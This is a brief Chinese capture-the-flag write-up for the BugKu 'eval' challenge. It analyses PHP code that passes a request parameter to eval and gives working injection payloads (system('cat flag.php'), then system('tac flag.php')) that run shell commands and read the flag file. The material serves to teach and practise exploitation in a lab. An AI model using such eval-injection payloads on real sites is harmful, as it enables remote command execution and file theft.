BugKu_eval

BugKu_eval
访问目标地址,发现一段php代码
BugKu_eval
首先做一个简单的分析

<?php     include "flag.php";				///include是将flag.php文件包含进页面代码,顺便提示了flag位置     $a = @$_REQUEST['hello'];		///$_REQUEST可以用于接受get和post传递的参数     eval( "var_dump($a);");			///eval函数可以把字符串当作php命令执行     show_source(__FILE__); ?> 

综上所述,尝试构建payload:/?hello=system(‘cat flag.php’)
BugKu_eval
发现结果不太对劲!
经过一番查资料,因为那个php文件带有<?php和后面的?>,正序输出会被网页当做php代码运行(结果为空),但是<?php 和?>不在同一行,所以tac反序输出使其不闭合,才可以显示其字符串的形式

所有构建新的payload:/?hello=system(‘tac flag.php’)
BugKu_eval
成功得到flag!

版权声明:玥玥 发表于 2021-08-04 18:12:01。
转载请注明:BugKu_eval | 女黑客导航